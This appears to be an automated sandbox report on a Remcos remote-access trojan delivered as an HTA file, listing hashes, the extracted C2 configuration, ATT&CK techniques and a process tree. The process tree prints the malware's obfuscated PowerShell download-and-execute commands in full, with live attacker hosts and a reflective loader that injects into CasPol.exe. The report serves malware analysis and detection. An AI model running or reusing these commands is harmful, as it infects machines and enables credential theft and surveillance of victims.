remcos | 2a7f932fb984d3485eb721810e58cf929a1d1fe719d3b29e15f4f7ef0d4ad8a9

Analysis

max time kernel
148s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
17-01-2025 06:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

creatingthingswithgoodnews.hta
Size

47KB
MD5

15d8b7e5f5bd86deb3bcf73b6061055c
SHA1

3179de79caea710c656c0d1cfa87c384b101386e
SHA256

2a7f932fb984d3485eb721810e58cf929a1d1fe719d3b29e15f4f7ef0d4ad8a9
SHA512

860f3e6da3c2696a435878c6ab3619274d112b3ef10512e2805145a33e63126daa49745d3571b88f9b8c957e0255077f821d943ad4a88f4a0b425acd8667bb8f
SSDEEP

192:iVMAWvOBSclFWvOLvKrYbnywoR/6cTKocHncCceWvOtcew7lvRvcT:WiOsIFiOLir0ywESto6nx3iOtM7lvRvw

Score

10^/10

remcos remotehost collection defense_evasion discovery execution rat

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

https://ia600805.us.archive.org/10/items/new_image_202501/new_image.jpg%20

exe.dropper

https://ia600805.us.archive.org/10/items/new_image_202501/new_image.jpg%20

Extracted

Family

remcos

Botnet

RemoteHost

216.9.226.100:3898

Attributes

audio_folder
MicRecords
audio_path
ApplicationPath
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
true
install_flag
false
keylog_crypt
true
keylog_file
logs.dat
keylog_flag
false
keylog_folder
mic
mouse_option
false
mutex
Rmc-Q9T2QD
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Remcos family
remcos

Detected Nirsoft tools 3 IoCs

Free utilities often used by attackers which can steal passwords, product keys, etc.

resource	yara_rule
behavioral2/memory/4528-111-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral2/memory/1100-110-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft
behavioral2/memory/4644-108-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft

NirSoft MailPassView 1 IoCs

Password recovery tool for various email clients

resource	yara_rule
behavioral2/memory/1100-110-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 1 IoCs

Password recovery tool for various web browsers

resource	yara_rule
behavioral2/memory/4644-108-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Blocklisted process makes network request 3 IoCs

flow	pid	Process
12	2376	powershell.exe
18	2324	powershell.exe
27	2324	powershell.exe

Evasion via Device Credential Deployment 1 IoCs

defense_evasion execution

pid	Process
2376	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	WScript.exe

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	CasPol.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2324	powershell.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 2324 set thread context of 4256	2324	powershell.exe	107
PID 4256 set thread context of 4644	4256	CasPol.exe	110
PID 4256 set thread context of 1100	4256	CasPol.exe	111
PID 4256 set thread context of 4528	4256	CasPol.exe	112

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 11 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
2376	powershell.exe
2376	powershell.exe
2324	powershell.exe
2324	powershell.exe
2324	powershell.exe
2324	powershell.exe
4644	CasPol.exe
4644	CasPol.exe
4528	CasPol.exe
4528	CasPol.exe
4644	CasPol.exe
4644	CasPol.exe

Suspicious behavior: MapViewOfSection 4 IoCs

pid	Process
4256	CasPol.exe
4256	CasPol.exe
4256	CasPol.exe
4256	CasPol.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2376	powershell.exe
Token: SeDebugPrivilege	2324	powershell.exe
Token: SeDebugPrivilege	4528	CasPol.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4256	CasPol.exe

Suspicious use of WriteProcessMemory 46 IoCs

description	pid	Process	procid_target
PID 1204 wrote to memory of 4100	1204	mshta.exe	83
PID 1204 wrote to memory of 4100	1204	mshta.exe	83
PID 1204 wrote to memory of 4100	1204	mshta.exe	83
PID 4100 wrote to memory of 2376	4100	cmd.exe	85
PID 4100 wrote to memory of 2376	4100	cmd.exe	85
PID 4100 wrote to memory of 2376	4100	cmd.exe	85
PID 2376 wrote to memory of 1172	2376	powershell.exe	86
PID 2376 wrote to memory of 1172	2376	powershell.exe	86
PID 2376 wrote to memory of 1172	2376	powershell.exe	86
PID 1172 wrote to memory of 656	1172	csc.exe	87
PID 1172 wrote to memory of 656	1172	csc.exe	87
PID 1172 wrote to memory of 656	1172	csc.exe	87
PID 2376 wrote to memory of 1160	2376	powershell.exe	94
PID 2376 wrote to memory of 1160	2376	powershell.exe	94
PID 2376 wrote to memory of 1160	2376	powershell.exe	94
PID 1160 wrote to memory of 2324	1160	WScript.exe	95
PID 1160 wrote to memory of 2324	1160	WScript.exe	95
PID 1160 wrote to memory of 2324	1160	WScript.exe	95
PID 2324 wrote to memory of 4392	2324	powershell.exe	106
PID 2324 wrote to memory of 4392	2324	powershell.exe	106
PID 2324 wrote to memory of 4392	2324	powershell.exe	106
PID 2324 wrote to memory of 4256	2324	powershell.exe	107
PID 2324 wrote to memory of 4256	2324	powershell.exe	107
PID 2324 wrote to memory of 4256	2324	powershell.exe	107
PID 2324 wrote to memory of 4256	2324	powershell.exe	107
PID 2324 wrote to memory of 4256	2324	powershell.exe	107
PID 2324 wrote to memory of 4256	2324	powershell.exe	107
PID 2324 wrote to memory of 4256	2324	powershell.exe	107
PID 2324 wrote to memory of 4256	2324	powershell.exe	107
PID 2324 wrote to memory of 4256	2324	powershell.exe	107
PID 2324 wrote to memory of 4256	2324	powershell.exe	107
PID 4256 wrote to memory of 2096	4256	CasPol.exe	109
PID 4256 wrote to memory of 2096	4256	CasPol.exe	109
PID 4256 wrote to memory of 2096	4256	CasPol.exe	109
PID 4256 wrote to memory of 4644	4256	CasPol.exe	110
PID 4256 wrote to memory of 4644	4256	CasPol.exe	110
PID 4256 wrote to memory of 4644	4256	CasPol.exe	110
PID 4256 wrote to memory of 4644	4256	CasPol.exe	110
PID 4256 wrote to memory of 1100	4256	CasPol.exe	111
PID 4256 wrote to memory of 1100	4256	CasPol.exe	111
PID 4256 wrote to memory of 1100	4256	CasPol.exe	111
PID 4256 wrote to memory of 1100	4256	CasPol.exe	111
PID 4256 wrote to memory of 4528	4256	CasPol.exe	112
PID 4256 wrote to memory of 4528	4256	CasPol.exe	112
PID 4256 wrote to memory of 4528	4256	CasPol.exe	112
PID 4256 wrote to memory of 4528	4256	CasPol.exe	112

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\creatingthingswithgoodnews.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1204
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" "/c PowErsHelL -ex undEfinED -nop -W 1 -C dEViCecrEdeNtiaLdEPLOyMeNt.Exe ; InVOkE-eXPReSsiOn($(iNvoKe-eXpResSIoN('[sYSTEM.tExT.ENCODInG]'+[ChaR]58+[Char]0x3a+'UTF8.geTsTRInG([sySTeM.CoNVert]'+[chaR]0x3A+[cHar]58+'FROmBAsE64StRIng('+[CHAr]34+'JFpFY3FqR0U0OCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1CZVJEZWZpbmlUSW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJ0WlVrRWcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtueURuR1Qsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNoWG1xSSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEpURm1UeCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV05qRGlkRUspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlZzS3F2RGlTblB4IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZVNQQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1jICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFpFY3FqR0U0ODo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE1LjIzNS4yMDMuMTA0LzgwL2NyZWF0ZWRiZXN0dGhpbmdzd2l0aG1lZ2l2ZW5tZWdvb2R0aGluZ3Nmb3JlbnRpcmUudElGIiwiJGVOdjpBUFBEQVRBXGNyZWF0ZWRiZXN0dGhpbmdzd2l0aG1lZ2l2ZW5tZWdvb2R0aGluZ3Nmb3JlbnRpLnZiUyIsMCwwKTtzdEFyVC1TTGVFcCgzKTtJbnZPa2UtZVhwUkVzc0lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXGNyZWF0ZWRiZXN0dGhpbmdzd2l0aG1lZ2l2ZW5tZWdvb2R0aGluZ3Nmb3JlbnRpLnZiUyI='+[CHAr]34+'))')))"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4100
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    PowErsHelL -ex undEfinED -nop -W 1 -C dEViCecrEdeNtiaLdEPLOyMeNt.Exe ; InVOkE-eXPReSsiOn($(iNvoKe-eXpResSIoN('[sYSTEM.tExT.ENCODInG]'+[ChaR]58+[Char]0x3a+'UTF8.geTsTRInG([sySTeM.CoNVert]'+[chaR]0x3A+[cHar]58+'FROmBAsE64StRIng('+[CHAr]34+'JFpFY3FqR0U0OCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1CZVJEZWZpbmlUSW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJ0WlVrRWcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtueURuR1Qsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNoWG1xSSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEpURm1UeCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV05qRGlkRUspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlZzS3F2RGlTblB4IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZVNQQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1jICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFpFY3FqR0U0ODo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE1LjIzNS4yMDMuMTA0LzgwL2NyZWF0ZWRiZXN0dGhpbmdzd2l0aG1lZ2l2ZW5tZWdvb2R0aGluZ3Nmb3JlbnRpcmUudElGIiwiJGVOdjpBUFBEQVRBXGNyZWF0ZWRiZXN0dGhpbmdzd2l0aG1lZ2l2ZW5tZWdvb2R0aGluZ3Nmb3JlbnRpLnZiUyIsMCwwKTtzdEFyVC1TTGVFcCgzKTtJbnZPa2UtZVhwUkVzc0lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXGNyZWF0ZWRiZXN0dGhpbmdzd2l0aG1lZ2l2ZW5tZWdvb2R0aGluZ3Nmb3JlbnRpLnZiUyI='+[CHAr]34+'))')))"
    3⤵
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2376
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\roxzdz25\roxzdz25.cmdline"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1172
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB333.tmp" "c:\Users\Admin\AppData\Local\Temp\roxzdz25\CSCD0F9902821F04A20A1C81AF25B16EAF.TMP"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:656
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\createdbestthingswithmegivenmegoodthingsforenti.vbS"
      4⤵
      Checks computer location settings
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1160
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.emroflriglufi#uaebsiehs/08/401.302.532.51//:p##h';$restoredText = $originalText -replace '#', 't';$Grasso = 'https://ia600805.us.archive.org/10/items/new_image_202501/new_image.jpg ';$Orvieto = New-Object System.Net.WebClient;$kryptopyrrole = $Orvieto.DownloadData($Grasso);$salinometers = [System.Text.Encoding]::UTF8.GetString($kryptopyrrole);$sulking = '<<BASE64_START>>';$InfiniBand = '<<BASE64_END>>';$overdramatize = $salinometers.IndexOf($sulking);$timelord = $salinometers.IndexOf($InfiniBand);$overdramatize -ge 0 -and $timelord -gt $overdramatize;$overdramatize += $sulking.Length;$funambulation = $timelord - $overdramatize;$jiggles = $salinometers.Substring($overdramatize, $funambulation);$talons = -join ($jiggles.ToCharArray() | ForEach-Object { $_ })[-1..-($jiggles.Length)];$occluders = [System.Convert]::FromBase64String($talons);$thalis = [System.Reflection.Assembly]::Load($occluders);$correctnesses = [dnlib.IO.Home].GetMethod('VAI');$correctnesses.Invoke($null, @($restoredText, 'hereon', 'hereon', 'hereon', 'CasPol', 'hereon', 'hereon','hereon','hereon','hereon','hereon','hereon','1','hereon','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2324
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
        6⤵
        
        PID:4392
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
        6⤵
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:4256
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\fftusjmlxuhovuxaadmtwsee"
        7⤵
        
        PID:2096
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\fftusjmlxuhovuxaadmtwsee"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4644
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\hzyntbwnlczsfalmjoyuyfzvbfa"
        7⤵
        Accesses Microsoft Outlook accounts
        System Location Discovery: System Language Discovery
        
        PID:1100
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\rclfluhgzkrfiohqaztwjkteclkivx"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4528

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\mic\logs.dat

Filesize
102B

MD5
3aef7f42113011dea3898b18d201ab1c

SHA1
6aed43702008cfec3cb09838bb8aa18a96ee7c0e

SHA256
cd70d87dbaccffe4b533059ec66f5cd35895ab659b1cf5fbdd6ce998c11ec138

SHA512
1b184dfdd2faf7d16ad4f7a4df0b9a0fe7387c4b07bc93b5eb5be3ca9e871d2225f133feaad3fc2799a597eeb04a5f087bbebf827611a520708997a0f6385b42

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
3d086a433708053f9bf9523e1d87a4e8

SHA1
b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28

SHA256
6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69

SHA512
931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
19KB

MD5
4dbbc31afee273c54dbc00f88c2132c7

SHA1
78fa7097e8f097847d39386fdf16b4603e03014b

SHA256
5fdace36c30b2e7fa3ed18db3ddbcfb06f17b8204afebc5f951afa112e6ec995

SHA512
893f118cdfd53d9727dcd2e498f2594dc9583051e8b3ac2f9a3fa932f0037e9e28d79e5543bed6cfbb12ec74f8de1b8fa7517a132d9659a57e6d3987bec5aaf3

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESB333.tmp

Filesize
1KB

MD5
a4ae02f3476dc61e2ab302f4d36f7a93

SHA1
f4ec8956abf9f2fc055dedb2e707d1a01d192e63

SHA256
1d2a90e79b574c5948021ab524ba939b2408a9e33fb603208a1bf6f99d31baa1

SHA512
fe41926f468be44dc8958e726cbdc6844542445c5c6d89d2248d40fb91ad19da8f0797029f179ef7945b5704639268dd9c566821147ae3eb246735b9b0980bfd

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ykavhbzb.nj1.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\fftusjmlxuhovuxaadmtwsee

Filesize
4KB

MD5
17eece3240d08aa4811cf1007cfe2585

SHA1
6c10329f61455d1c96e041b6f89ee6260af3bd0f

SHA256
7cc0db44c7b23e4894fe11f0d8d84b2a82ad667eb1e3504192f3ba729f9a7903

SHA512
a7de8d6322410ec89f76c70a7159645e8913774f38b84aafeeeb9f90dc3b9aa74a0a280d0bb6674790c04a8ff2d059327f02ebfda6c4486778d53b7fc6da6370

Download Submit
C:\Users\Admin\AppData\Local\Temp\roxzdz25\roxzdz25.dll

Filesize
3KB

MD5
06db360faa8b6323ca24f05e83393360

SHA1
36515cd074a22ba743f575c4cacc6bc5990a760d

SHA256
b445946a213b3aa273ff21b646deeaea28a33ee41f5e03848a8cbcb043efa71f

SHA512
9ad34679799c0cd92cdff61cd8fcb4781c1e91428dca29a05ffdba3b62e73f71b95b6d7a6fa43a6936a96455c4c5f4727d2cd6dc56b4823e4f1ebb11d98fa051

Download Submit
C:\Users\Admin\AppData\Roaming\createdbestthingswithmegivenmegoodthingsforenti.vbS

Filesize
225KB

MD5
73f356f3d97612af68b546898f5a623e

SHA1
f625bf9c945f63a203a491cab55883343bc8f155

SHA256
4db02c0003eed7179bf597b6ebb7ff1a7dec4fd3714ec804c9b77e471cbfb03e

SHA512
9471927e26db1f306ece3d0b803006bc921d66a045a9bdccf83c0e5aea209f43ca3a45f851f5ec2d76753f965b0bc14b436634d57e09c55c35c5b5f81625fe58

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\roxzdz25\CSCD0F9902821F04A20A1C81AF25B16EAF.TMP

Filesize
652B

MD5
61ed8fe0e597922133207b0be51345e9

SHA1
088956a5961ce27c719c3bfbc3d05a186f1792fe

SHA256
cac398a5b122cc392e9cb203dae787a22027a86871b609b2e9c3573e2b289a27

SHA512
e7a145040e1dec832a180db2ca95e9390fa6be755aab99f2bc2f7e23ca428c2fa395dc7e0f5a8d485de86a4bda79400767079dcd4abdd1c24b4e612a2662663b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\roxzdz25\roxzdz25.0.cs

Filesize
486B

MD5
7820cc88041232a1bd073f1bc336c75d

SHA1
39216f5f3886f125d140d8b583eb2e99a67452a2

SHA256
24ae2b2c9b2fb8cb9d853d1bc03801cd9385d4945fd45695c009da551cb2b943

SHA512
3c098fcc5b147a23c54f822559cb924bbddc1f55166e4f3d95211fe4e043de1ef8d33a494dd2d956a9aff344543f8609018b10927622b2552aed78c41efff3ab

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\roxzdz25\roxzdz25.cmdline

Filesize
369B

MD5
f75ce9ccf6d70217c3e657c397762721

SHA1
ba14d37615051808cb0b4b1ad624a3111fc75fae

SHA256
2c25448a09d66f61784602deac1acf1b56730868f83f4ebb50d871cd6c719f5c

SHA512
30958f312bf7106bdc4bc42bcf092cc0115cf8cd076ab9553c5f561380087934562f2ca365bd28b3f1544e2560fffd5689348776911fa9bfe9cde443600f7f2b

Download Submit
memory/1100-107-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/1100-110-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/1100-104-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/2324-83-0x0000000006000000-0x0000000006354000-memory.dmp

Filesize
3.3MB

Download
memory/2324-86-0x0000000007990000-0x0000000007B4A000-memory.dmp

Filesize
1.7MB

Download
memory/2324-87-0x0000000007DD0000-0x0000000007E6C000-memory.dmp

Filesize
624KB

Download
memory/2324-88-0x0000000006360000-0x000000000636C000-memory.dmp

Filesize
48KB

Download
memory/2376-70-0x00000000717E0000-0x0000000071F90000-memory.dmp

Filesize
7.7MB

Download
memory/2376-60-0x00000000717EE000-0x00000000717EF000-memory.dmp

Filesize
4KB

Download
memory/2376-36-0x0000000007D80000-0x00000000083FA000-memory.dmp

Filesize
6.5MB

Download
memory/2376-38-0x00000000717E0000-0x0000000071F90000-memory.dmp

Filesize
7.7MB

Download
memory/2376-39-0x0000000007760000-0x000000000776A000-memory.dmp

Filesize
40KB

Download
memory/2376-40-0x0000000007980000-0x0000000007A16000-memory.dmp

Filesize
600KB

Download
memory/2376-41-0x00000000078E0000-0x00000000078F1000-memory.dmp

Filesize
68KB

Download
memory/2376-42-0x0000000007930000-0x000000000793E000-memory.dmp

Filesize
56KB

Download
memory/2376-43-0x0000000007940000-0x0000000007954000-memory.dmp

Filesize
80KB

Download
memory/2376-44-0x0000000007A20000-0x0000000007A3A000-memory.dmp

Filesize
104KB

Download
memory/2376-45-0x0000000007970000-0x0000000007978000-memory.dmp

Filesize
32KB

Download
memory/2376-35-0x00000000717E0000-0x0000000071F90000-memory.dmp

Filesize
7.7MB

Download
memory/2376-34-0x0000000007650000-0x00000000076F3000-memory.dmp

Filesize
652KB

Download
memory/2376-33-0x0000000007590000-0x00000000075AE000-memory.dmp

Filesize
120KB

Download
memory/2376-23-0x000000006E210000-0x000000006E564000-memory.dmp

Filesize
3.3MB

Download
memory/2376-20-0x0000000007550000-0x0000000007582000-memory.dmp

Filesize
200KB

Download
memory/2376-58-0x0000000007970000-0x0000000007978000-memory.dmp

Filesize
32KB

Download
memory/2376-6-0x0000000005D00000-0x0000000005D66000-memory.dmp

Filesize
408KB

Download
memory/2376-61-0x00000000717E0000-0x0000000071F90000-memory.dmp

Filesize
7.7MB

Download
memory/2376-66-0x00000000717E0000-0x0000000071F90000-memory.dmp

Filesize
7.7MB

Download
memory/2376-21-0x00000000717E0000-0x0000000071F90000-memory.dmp

Filesize
7.7MB

Download
memory/2376-0-0x00000000717EE000-0x00000000717EF000-memory.dmp

Filesize
4KB

Download
memory/2376-72-0x00000000717E0000-0x0000000071F90000-memory.dmp

Filesize
7.7MB

Download
memory/2376-22-0x000000006E0A0000-0x000000006E0EC000-memory.dmp

Filesize
304KB

